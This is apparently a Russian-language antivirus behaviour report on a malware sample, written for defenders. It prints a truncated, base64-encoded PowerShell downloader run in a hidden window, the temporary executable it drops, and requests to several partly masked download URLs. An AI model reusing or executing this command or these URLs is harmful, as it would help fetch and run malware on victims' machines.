Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHUAZwAxAHAAdgB4AD0AKAAnAEoAaQBmADMAdQBxACcAKwAnAHAAJwApADsALgAoACcAbgBlAHcAJwArACcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAHYAOgB0AGUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\office2019\ben6q6ae.exe
Удаляет следующие файлы
- %TEMP%\office2019\ben6q6ae.exe
Подменяет следующие файлы
- %TEMP%\office2019\ben6q6ae.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://me####ndwheels.com/backup/3E/
- http://ev##dijk.eu/4fd2c798720871f16/k/
- http://is##er.net/allmyguests041/BQ/
- http://lo###pura.com/cgi-bin/P/
- http://po###rkt.com/zebra/d/
- http://ly######rlando-villa.com/Images/N/
- http://in####ero-naujok.de/cgi-bin/kVA/
UDP
- DNS ASK me####ndwheels.com
- DNS ASK ev##dijk.eu
- DNS ASK is##er.net
- DNS ASK lo###pura.com
- DNS ASK po###rkt.com
- DNS ASK ly######rlando-villa.com
- DNS ASK in####ero-naujok.de
- DNS ASK jo###-lanz.de
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHUAZwAxAHAAdgB4AD0AKAAnAEoAaQBmADMAdQBxACcAKwAnAHAAJwApADsALgAoACcAbgBlAHcAJwArACcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBOAHYAOgB0AGUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)
